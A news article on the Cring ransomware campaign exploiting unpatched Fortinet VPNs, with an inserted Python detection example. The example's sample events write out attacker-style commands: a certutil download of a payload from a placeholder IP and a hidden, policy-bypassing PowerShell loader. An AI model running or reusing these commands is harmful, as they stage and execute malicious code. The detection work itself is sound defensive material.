A vulnerability in Fortinet VPNs is being exploited by a new ransomware strain dubbed Cring to breach and encrypt industrial sector companies’ networks.
Cring ransomware (also known as Crypt3r, Vjiszy1lo, Ghost, and Phantom) was discovered by Amigo_A in January and has since been tracked by the CSIRT team of Swiss telecommunications provider Swisscom.
After gaining initial access, the Cring operators drop customized Mimikatz samples, followed by Cobalt Strike, and download the ransomware payloads with the legitimate Windows CertUtil certificate manager to bypass security software.
According to a report published by Kaspersky researchers, the attackers exploit Internet-exposed Fortigate SSL VPN servers left unpatched against the CVE-2018-13379 vulnerability, which allows them to breach their targets’ networks.
The victims of these attacks include industrial enterprises in European countries. In at least one case, the attack caused a temporary shutdown of the industrial process because the servers used to control it were encrypted.
From the Fortinet VPN appliance, the ransomware operators move laterally through the target’s enterprise network, stealing Windows user credentials with Mimikatz until they gain control of the domain administrator account.
The ransomware payloads are then delivered to devices on the victims’ networks using the Cobalt Strike threat emulation framework deployed using a malicious PowerShell script.
The ransomware encrypts only certain files on the compromised devices using strong encryption algorithms (RSA-8192 + AES-128) after removing backup files and killing Microsoft Office and Oracle Database processes.
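The two tradecraft details above, CertUtil used as a downloader and a PowerShell loader for Cobalt Strike, are cheap to hunt for in process-creation telemetry. The following is an added example, not from the article or Kaspersky's report, that runs two heuristic rules over constructed Sysmon-style events; the hosts, paths and URL are invented.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, trimmed
# to the fields the rules need). Hosts, paths and the URL are made up.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/p.bin C:\\Windows\\Temp\\p.bin"},
    {"host": "ws01", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},
    {"host": "srv02", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -File C:\\Users\\Public\\s.ps1"},
    {"host": "srv02", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup-report.ps1"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def certutil_remote_fetch(event):
    """certutil.exe with a URL on its command line: the certificate tool is
    acting as a downloader, the staging trick the article attributes to Cring."""
    if event["image"].lower() != "certutil.exe":
        return None
    match = URL_RE.search(event["cmdline"])
    return f"certutil fetching remote content from {match.group(0)}" if match else None


def powershell_hidden_bypass(event):
    """powershell.exe run hidden with the execution policy bypassed, a typical
    shape for a loader script; legitimate admin scripts rarely need both."""
    if event["image"].lower() != "powershell.exe":
        return None
    flags = event["cmdline"].lower()
    if "-executionpolicy bypass" in flags and re.search(r"-w(indowstyle)?\s+hidden", flags):
        return "hidden PowerShell with execution policy bypassed"
    return None


RULES = (certutil_remote_fetch, powershell_hidden_bypass)


def scan(events):
    """Return (host, image, reason) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((ev["host"], ev["image"], reason))
    return hits
```

Only the two malicious-looking events are flagged; the certificate verification and the plain backup-report script pass through untouched.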
Ransom notes are then dropped, warning victims that their network has been encrypted and that they must pay promptly because the decryption key will not be kept indefinitely.
Victims have been using the ID-Ransomware service to check whether their systems were hit by Cring. 30 Cring ransomware samples have been submitted so far, at least one per day since the end of January.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warned this week of advanced persistent threat (APT) actors scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379 exploits.
The joint advisory also warns of attackers enumerating servers unpatched against CVE-2020-12812 and CVE-2019-5591.
Any servers compromised during these infiltration attempts might be used in future attacks as initial access vectors to breach government or commercial organizations’ networks.
Fortinet stated that CVE-2018-13379 is an old vulnerability that was resolved in May 2019, and that customers who have still not upgraded must immediately apply the upgrade and mitigations.